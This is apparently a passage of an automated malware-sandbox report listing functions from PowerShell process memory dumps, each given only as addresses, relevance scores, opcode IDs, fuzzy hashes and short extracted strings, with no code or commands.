                                                              Function 00007FFB4B1312C3 Relevance: .2, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1661116590.00007FFB4B130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b130000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a0993360fa31540705d2c01745e26d208698f877294da558230b02b242053f4
                                                              • Instruction ID: caf26a1a5a2f4fb63fed19f4d6cfc21ce17572f89d9ed372b0783c9b3f6e4349
                                                              • Opcode Fuzzy Hash: 3a0993360fa31540705d2c01745e26d208698f877294da558230b02b242053f4
                                                              • Instruction Fuzzy Hash: CE4159F3A2DA894FE795EE28C8805B477D2FF98314B1454BDD44DC31A2ED29EC258B42
                                                              Function 00007FFB4B06BFF4 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1660466523.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9c3769c4ee7f6942b635c3a3feb5ed42ba8ceaf3d297426a547fd8253d3e3bb2
                                                              • Instruction ID: 802aac03ed9ccec9651c7cc4da6eb25ebbda014269011004576a8cc39b904dd9
                                                              • Opcode Fuzzy Hash: 9c3769c4ee7f6942b635c3a3feb5ed42ba8ceaf3d297426a547fd8253d3e3bb2
                                                              • Instruction Fuzzy Hash: A231CFB0C1D64E8EFBB4AF29CD49BF93294FF45316F40813DD50D862A2DA78A945CA11
                                                              Function 00007FFB4B063985 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1660466523.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                              • Instruction ID: 4f56472339e0875df26d58c11a9047966442f15a866b12ada8f27de48d97d6f8
                                                              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                              • Instruction Fuzzy Hash: 8001A77010CB0C8FDB44EF0CE451AA5B7E0FB85324F10056DE58AC36A1DA32E882CB45
                                                              Function 00007FFB4B074391 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1660466523.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c100d0f8d6ba270889d745896e9757b08b89772ffeb1883bbb0f91d1b9547f0
                                                              • Instruction ID: 65308fe6c4bea66c47ae5d20a761bd47b027c51bb626beb3b485e9b89b1a6a17
                                                              • Opcode Fuzzy Hash: 7c100d0f8d6ba270889d745896e9757b08b89772ffeb1883bbb0f91d1b9547f0
                                                              • Instruction Fuzzy Hash: 91F0CD51A1EA855FE346A77C94256587791FB95350F0540F6D04CC76D3DA1C580583A2

                                                              Non-executed Functions

                                                              Function 00007FFB4B0706FA Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1660466523.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: =L_^$L_^$L_^P$L_^V$_
                                                              • API String ID: 0-2580963357
                                                              • Opcode ID: 90e3d31252bdb66d423457d6905320c742e0acebd8e51a15981483598dd271a7
                                                              • Instruction ID: 0a83899607b4ee141373716f08b39550455d6d3c39eadc56493a700c63f919cd
                                                              • Opcode Fuzzy Hash: 90e3d31252bdb66d423457d6905320c742e0acebd8e51a15981483598dd271a7
                                                              • Instruction Fuzzy Hash: AD5106E3D0D21179E21276B8F4510FD7B68CF8237AB18D5B7D28D891839D28288686F9
                                                              Function 00007FFB4B07113A Relevance: 6.4, Strings: 5, Instructions: 174COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1660466523.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8M8K$@K8K$`L8K$hJ8K$x28K
                                                              • API String ID: 0-1273449106
                                                              • Opcode ID: aa8846f7137ab78bf6141bb474c80267d01ae8ccc628bc97d62de2d97d963c96
                                                              • Instruction ID: c10c5f28509e2965a54532e720f38c60143e100738ea431eebd3da26b055a7d8
                                                              • Opcode Fuzzy Hash: aa8846f7137ab78bf6141bb474c80267d01ae8ccc628bc97d62de2d97d963c96
                                                              • Instruction Fuzzy Hash: 22516EC3B0DAC61BE3526A7C98161B5AFC1FF83261B4A85F5D1C84B2F7EC185C168381
                                                              Function 00007FFB4B07065D Relevance: 5.2, Strings: 4, Instructions: 227COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1660466523.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: L_^$L_^B$L_^D$_
                                                              • API String ID: 0-724173574
                                                              • Opcode ID: fb1420976299d61c9be1997c196caa4c970b6b3e2172386b39265cc08d208246
                                                              • Instruction ID: a78e5468c40dbe8d13922b7c5ea982a53287a8e0e5bb26c84e1fc8f2f90e7aad
                                                              • Opcode Fuzzy Hash: fb1420976299d61c9be1997c196caa4c970b6b3e2172386b39265cc08d208246
                                                              • Instruction Fuzzy Hash: 2961D9D3D0D25175E21276B8F4611FD7B68CF8237AB18C5B7D68D880839D28248786F9
                                                              Function 00007FFB4B0710A8 Relevance: 5.2, Strings: 4, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1660466523.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8M8K$@K8K$`L8K$x28K
                                                              • API String ID: 0-726053864
                                                              • Opcode ID: a2966713d11f64615070e5ad3ce83ffaffa284b36117eb0bfade795195fc25c5
                                                              • Instruction ID: 4bc0af12d58bc087d6fdb1ff632a4455b6608b12e2adf0fb31c94cbfd98b45fb
                                                              • Opcode Fuzzy Hash: a2966713d11f64615070e5ad3ce83ffaffa284b36117eb0bfade795195fc25c5
                                                              • Instruction Fuzzy Hash: 64514DC3A0DAC20BE3126E7C98560B5BFD1FF82251B0985FAD1C84B2F7DC1858568392
                                                              Function 00007FFB4B0706F8 Relevance: 5.2, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1660466523.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: =L_^$L_^$L_^V$_
                                                              • API String ID: 0-2566299978
                                                              • Opcode ID: 14d55c92316229655f8925e4c9228147b1ed4824719f11d0233a5a4ae0745ded
                                                              • Instruction ID: 2f5e7f456b5de1fcf1194f7dfae21f0df1fc1d8415a1d502abb13ab70c2ad61a
                                                              • Opcode Fuzzy Hash: 14d55c92316229655f8925e4c9228147b1ed4824719f11d0233a5a4ae0745ded
                                                              • Instruction Fuzzy Hash: B05108E3D0D21179E21276B8F4510FE7B68CFC2376B08D1B7D68D890439D28288786F9
                                                              Function 00007FFB4B06F9FA Relevance: 5.1, Strings: 4, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1660466523.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b060000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: cJ$!kJ$"sJ$JL_^
                                                              • API String ID: 0-2114968000
                                                              • Opcode ID: f811a03f7f6a4afea3c0373d392142e1a7f72fc5229cf30eb5110cca4e9d6f0b
                                                              • Instruction ID: f7e1064d24cf2b0d247da382ca1e1bf43f031c1ae8b89e4fd440a6c442d135fc
                                                              • Opcode Fuzzy Hash: f811a03f7f6a4afea3c0373d392142e1a7f72fc5229cf30eb5110cca4e9d6f0b
                                                              • Instruction Fuzzy Hash: DBF0C857B24E226691013AFDF8120F833DCDBEE1737484273D705CA1535856588B42FB

                                                              Executed Functions

                                                              Function 00007FFB4B04B976 Relevance: .5, Instructions: 472COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 705a9f277ad676025f95f5ed79f85e8c3d9bfb3e793c0e74bf10c3e2a44a82a0
                                                              • Instruction ID: 4ba0e5620b569a34347ae7f1e244935651dec639a42f41d055a0fe931b02a37b
                                                              • Opcode Fuzzy Hash: 705a9f277ad676025f95f5ed79f85e8c3d9bfb3e793c0e74bf10c3e2a44a82a0
                                                              • Instruction Fuzzy Hash: 35F1847090CA4E8FEBA8EF28CC557E937D1FF54311F04826AE84DC7295DB7899458B82
                                                              Function 00007FFB4B04C722 Relevance: .5, Instructions: 457COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c795e7c66e41ec64409ebd06b6ffa6885224f21ee64b9ebe3aad1423511acfdf
                                                              • Instruction ID: 970c3cde09f2e4ea5d4767477ae5f37ac7b127ec67a9b7823a55379b510832c7
                                                              • Opcode Fuzzy Hash: c795e7c66e41ec64409ebd06b6ffa6885224f21ee64b9ebe3aad1423511acfdf
                                                              • Instruction Fuzzy Hash: 0FE1B37090CA8E8FEBA8EF28C8557E977D1EB54311F14836EE84DC7291CF7899458B81
                                                              Function 00007FFB4B051AED Relevance: 2.6, Strings: 2, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ;N_H$H26K
                                                              • API String ID: 0-1710246564
                                                              • Opcode ID: 5899f096bfdc3a54fb6c6b98edc5963456c73b0cf4948d940898991c88c8908f
                                                              • Instruction ID: 9bc09302d281076d3db2364d898eb873e1406fe199a01d3b9ed9264dc76f76ab
                                                              • Opcode Fuzzy Hash: 5899f096bfdc3a54fb6c6b98edc5963456c73b0cf4948d940898991c88c8908f
                                                              • Instruction Fuzzy Hash: 3E01F9C945E6C66EE753A77448648727FE4CE4352A70C45EFE0D4C94A3E84C086BC353
                                                              Function 00007FFB4B113755 Relevance: .4, Instructions: 444COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1880556121.00007FFB4B110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b110000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba99fcab006e2283de4e486bc59220d5131441fc60fe88016fcd78240b404c70
                                                              • Instruction ID: f9dfb4fc12b4a4830b1d7f46e5820820b61b000959bd1c8e698fab6ec6df47d2
                                                              • Opcode Fuzzy Hash: ba99fcab006e2283de4e486bc59220d5131441fc60fe88016fcd78240b404c70
                                                              • Instruction Fuzzy Hash: EED176B292EA8A1FE796EF78D8551B57FE0EF0A314B0801FED08DC70A7D9189806C751
                                                              Function 00007FFB4B04C336 Relevance: .3, Instructions: 330COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cfb4092175eaaa5f52e2da53179996a4abedbfafaf3350e128515093aeb6b373
                                                              • Instruction ID: 053d73b01e4140f0e5fc6c63cadb3c0ebcc9f3a1d20249d5c80e6d048b21be06
                                                              • Opcode Fuzzy Hash: cfb4092175eaaa5f52e2da53179996a4abedbfafaf3350e128515093aeb6b373
                                                              • Instruction Fuzzy Hash: C5B1C67050CA4D8FEB69EF28D8557E93BD1FF55311F04826EE84DC7291CA34A945CB82
                                                              Function 00007FFB4B04F2A9 Relevance: .2, Instructions: 186COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d375de6a24e7ef4d0bb4283e8eba75b90bfe7cc68931273c3be926b457c873e0
                                                              • Instruction ID: 81d4ea94aa6a3ef426524592f6826e33322cd1c3d04f7848c57ef0ec538c7f37
                                                              • Opcode Fuzzy Hash: d375de6a24e7ef4d0bb4283e8eba75b90bfe7cc68931273c3be926b457c873e0
                                                              • Instruction Fuzzy Hash: C051D0B1A1CA594FEB9CEF68C9556B877D1FF99302F0540B9D54DC36A3CD28B8028741
                                                              Function 00007FFB4B04BE34 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f15283480ccf63c9f1a52236dadd1bde72feb63f2679ec816aa9739f4b9bad72
                                                              • Instruction ID: 69253a902599c239ce0d66d233f5bc75a862750c9bdb5e9b0dde511b509761fb
                                                              • Opcode Fuzzy Hash: f15283480ccf63c9f1a52236dadd1bde72feb63f2679ec816aa9739f4b9bad72
                                                              • Instruction Fuzzy Hash: 8B31307081D55D8EFBB8BF35CE4ABF43290FF45316F408539D60EC62A2DA386945CA01
                                                              Function 00007FFB4B043428 Relevance: .1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f139f9fb21c5593ac25b4d013256b826e07bc84ad366bfffb688c28c267c964
                                                              • Instruction ID: c43006983fe592537a034ff1e59657725035f0951cb584d9301f742d495c9db9
                                                              • Opcode Fuzzy Hash: 3f139f9fb21c5593ac25b4d013256b826e07bc84ad366bfffb688c28c267c964
                                                              • Instruction Fuzzy Hash: DD21A1B6A0D7914FE71BAB38D8A60E43FA0DF9323170945F7C586CA0B3D519284BC7A5
                                                              Function 00007FFB4B04F368 Relevance: .1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88cac8ba1e8f8c0c6267c2230cd4e444b17f69a6328757026bb5f95b78e7c853
                                                              • Instruction ID: 56c69ca27f323f995b9471cba76fc8add5b38f00b74872cb0b5cbe3a0ea522b5
                                                              • Opcode Fuzzy Hash: 88cac8ba1e8f8c0c6267c2230cd4e444b17f69a6328757026bb5f95b78e7c853
                                                              • Instruction Fuzzy Hash: C5114270A1CA198FD759EF28D4566AD76D1FF8C701F10427DE48ED3692CE28A8024786
                                                              Function 00007FFB4B0433B5 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                              • Instruction ID: 5bc9b09ee87c1ac689be063acc19aa175c0b8873c348cf8793d6a55d0ae7157e
                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                              • Instruction Fuzzy Hash: 5601A77110CB0C8FDB48EF0CE051AA5B7E0FB85324F10056DE58AC3661DA32E882CB45

                                                              Non-executed Functions

                                                              Function 00007FFB4B0513ED Relevance: 10.2, Strings: 8, Instructions: 172COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: /N_I$0K6K$8I6K$H16K$XJ6K$xK6K$/6K$J6K
                                                              • API String ID: 0-75804232
                                                              • Opcode ID: 66105e648f1ac58543fc49ad98ff0993a4fc8d14e1fa8afe61ba76116388c114
                                                              • Instruction ID: 7a1c660a26480fddb401406843bdc26dba43d1fefcfd5a4b950c49f1ac6a5aaa
                                                              • Opcode Fuzzy Hash: 66105e648f1ac58543fc49ad98ff0993a4fc8d14e1fa8afe61ba76116388c114
                                                              • Instruction Fuzzy Hash: 2A417D83E0DAD60BE315AA7CA8195346FC1FF92295B4585BAD1C8C72DBED186C1143C1
                                                              Function 00007FFB4B0466F3 Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0u&K$@r&K$H$K
                                                              • API String ID: 0-2382964246
                                                              • Opcode ID: 05cd0089c0450ad8091365923bcfc2c90afa5d2a83dc0293289a0d2849042bee
                                                              • Instruction ID: 2920c29a602e76a4d08fe6d69922cf06f98da34651933775cd05380e6ec331f8
                                                              • Opcode Fuzzy Hash: 05cd0089c0450ad8091365923bcfc2c90afa5d2a83dc0293289a0d2849042bee
                                                              • Instruction Fuzzy Hash: 73C19270A1CA5D8FDF98EF68C455AE97BE1FF68301F1441A9D409D7296DA34EC81CB80